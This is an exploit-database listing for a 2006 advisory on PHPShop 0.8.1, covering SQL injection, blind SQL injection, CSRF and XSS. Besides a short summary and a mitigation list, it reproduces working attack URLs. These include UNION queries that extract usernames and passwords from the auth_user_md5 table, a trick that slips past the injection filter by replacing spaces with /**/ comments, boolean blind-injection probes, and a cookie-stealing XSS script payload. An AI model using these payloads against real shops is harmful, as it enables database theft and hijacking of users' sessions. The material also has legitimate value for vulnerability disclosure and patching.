header-logo
Suggest Exploit
vendor:
PHPShop
by:
Andrea Fabrizi
7.5
CVSS
HIGH
SQL Injection, Blind SQL Injection, CSRF and XSS
89, 89, 352, 79
CWE
Product Name: PHPShop
Affected Version From: 2000.8.1
Affected Version To: 2000.8.1
Patch Exists: YES
Related CWE: N/A
CPE: a:phpshop:phpshop:0.8.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

SQL Injection, Blind SQL Injection, CSRF and XSS in PHPShop 0.8.1

PHPShop 0.8.1 is vulnerable to SQL Injection, Blind SQL Injection, CSRF and XSS. The SQL Injection security check can be bypassed by replacing spaces with comments (/**/). An attacker can inject malicious SQL queries to gain access to sensitive information from the database. An attacker can also inject malicious JavaScript code to gain access to the user's cookies. An attacker can also perform CSRF attacks to perform malicious actions on behalf of the user.

Mitigation:

Input validation, use of prepared statements, use of parameterized queries, use of stored procedures, use of secure cookies, use of CSRF tokens, use of XSS filters.
Source

Exploit-DB raw data:

**************************************************************
Vendor: http://www.phpshop.org/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
**************************************************************


### SQL INJECTION
http://server/phpshop-0.8.1/?page=admin/function_list&module_id=111111' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- aaa
http://server/phpshop-0.8.1/?page=shop/flypage&product_id=1011'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5 -- aaa
http://server/phpshop-0.8.1/?page=vendor/vendor_form&vendor_id=1' and '1'='1
http://server/phpshop-0.8.1/?page=admin/module_form&module_id=1' and '1'='1
http://server/phpshop-0.8.1/?page=admin/user_form&user_id=7322f75cc7ba16db1799fd8d25dbcde4' and '1'='1
http://server/phpshop-0.8.1/?page=vendor/vendor_category_form&vendor_category_id=6' and '1'='1
http://server/phpshop-0.8.1/?page=store/user_form&user_id=c88ce1c0ad365513d6fe085a8aacaebc' and '1'='1
http://server/phpshop-0.8.1/?page=store/payment_method_form&payment_method_id=1' and '1'='1
http://server/phpshop-0.8.1/?page=tax/tax_form&tax_rate_id=2' and '1'='1
...and many others...

The SQL Injection security check can be bypassed replacing spaces with comments (/**/)

### BLIND SQL INJECTION
http://server/phpshop-0.8.1/?page=shop/browse&category=aaa' and 1=1 -- aaa


### CSRF
http://server/phpshop-0.8.1/?page=shop/cart&func=cartAdd&product_id=321&
...and many others...


### XSS
http://server/phpshop-0.8.1/?page=order/order_print&order_id=1"><script>alert(document.cookie);</script>
...and many others...